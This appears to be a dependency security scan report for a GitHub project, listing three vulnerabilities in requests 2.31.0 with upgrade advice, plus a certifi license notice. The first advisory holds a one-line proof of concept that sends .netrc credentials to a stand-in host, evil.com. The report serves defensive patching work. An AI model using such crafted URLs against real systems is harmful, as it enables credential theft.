Vulnerabilities

 3 via 3 paths

Dependencies

 7

Source

 GitHub

Commit

 87902312

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Issue type
  • 3
  • 1
Severity
  • 4
Status
  • 4
  • 0
  • 0

medium severity

Insertion of Sensitive Information Into Sent Data

  • Vulnerable module: requests
  • Introduced through: requests@2.31.0

Detailed paths

  • Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 requests@2.31.0
    Remediation: Upgrade to requests@2.32.4.

Overview

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data due to incorrect URL processing. An attacker could craft a malicious URL that, when processed by the library, tricks it into sending the victim's .netrc credentials to a server controlled by the attacker.

Note:

This is only exploitable if the .netrc file contains an entry for the hostname that the attacker includes in the crafted URL's "intended" part (e.g., example.com in http://example.com:@evil.com/).

PoC

requests.get('http://example.com:@evil.com/')

Remediation

Upgrade requests to version 2.32.4 or higher.

References

Insertion of Sensitive Information Into Sent Data vulnerability report

medium severity

Always-Incorrect Control Flow Implementation

  • Vulnerable module: requests
  • Introduced through: requests@2.31.0

Detailed paths

  • Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 requests@2.31.0
    Remediation: Upgrade to requests@2.32.2.

Overview

Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session. An attacker can bypass certificate verification by making the first request with verify=False, causing all subsequent requests to ignore certificate verification regardless of changes to the verify value.

Notes:

  1. For requests <2.32.0, avoid setting verify=False for the first request to a host while using a Requests Session.

  2. For requests <2.32.0, call close() on Session objects to clear existing connections if verify=False is used.

  3. This vulnerability was initially fixed in version 2.32.0, which was yanked. Therefore, the next available fixed version is 2.32.2.

Remediation

Upgrade requests to version 2.32.2 or higher.

References

Always-Incorrect Control Flow Implementation vulnerability report

medium severity
new

Insecure Temporary File

  • Vulnerable module: requests
  • Introduced through: requests@2.31.0

Detailed paths

  • Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 requests@2.31.0
    Remediation: Upgrade to requests@2.33.0.

Overview

Affected versions of this package are vulnerable to Insecure Temporary File via the extract_zipped_paths function. An attacker can leverage unauthorized file replacement by pre-creating a malicious file in the system's temporary directory prior to extraction.

Note: Only applications that call extract_zipped_paths() directly are impacted.

Workaround

This vulnerability can be mitigated by setting the TMPDIR environment variable to a directory with restricted write access.

Remediation

Upgrade requests to version 2.33.0 or higher.

References

Insecure Temporary File vulnerability report

medium severity

MPL-2.0 license

  • Module: certifi
  • Introduced through: requests@2.31.0

Detailed paths

  • Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 requests@2.31.0 certifi@2026.2.25

MPL-2.0 license

MPL-2.0 license vulnerability report